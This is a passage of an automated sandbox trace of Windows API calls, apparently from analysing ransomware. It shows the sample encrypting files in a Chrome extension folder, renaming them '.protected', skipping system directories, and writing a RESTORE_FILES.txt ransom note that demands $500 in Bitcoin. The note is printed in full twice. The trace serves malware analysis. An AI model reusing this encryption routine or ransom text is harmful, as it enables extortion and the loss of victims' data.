HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\..") returned 148 [0079.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.256] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.256] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.256] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.257] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.257] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0079.258] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.258] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.258] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.258] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0079.259] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.259] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.259] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.259] CloseHandle (hObject=0x168) returned 1 [0079.259] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.protected") returned 169 [0079.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0079.260] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.260] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.260] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 163 [0079.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.260] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.260] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.261] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.261] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.261] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.261] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.261] CloseHandle (hObject=0x164) returned 1 [0079.261] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.261] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0079.261] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0079.261] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0079.261] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0079.261] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0079.262] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es") returned 142 [0079.262] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0079.262] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0079.262] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*") returned 144 [0079.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.262] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.262] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.262] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.262] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.262] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.262] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\.") returned 144 [0079.262] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.262] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.262] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.262] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.262] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.262] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.262] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.262] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\..") returned 145 [0079.262] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.262] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.262] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.262] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.262] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.262] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.263] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.263] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.263] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.263] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.263] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.263] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0079.263] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.263] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.264] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.264] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.265] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.265] CloseHandle (hObject=0x168) returned 1 [0079.265] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.protected") returned 166 [0079.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.protected")) returned 1 [0079.266] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.266] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.266] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\RESTORE_FILES.txt") returned 160 [0079.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.266] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.266] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.267] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.267] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.267] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.267] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.268] CloseHandle (hObject=0x164) returned 1 [0079.268] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0079.268] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0079.268] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419") returned 146 [0079.268] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0079.268] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0079.268] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*") returned 148 [0079.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.268] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.268] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.268] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.268] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.268] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\.") returned 148 [0079.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.268] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.269] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.269] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.269] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.269] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.269] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.269] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\..") returned 149 [0079.269] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.269] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.269] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.269] lstrcmpiW (lpString1="messages.json", 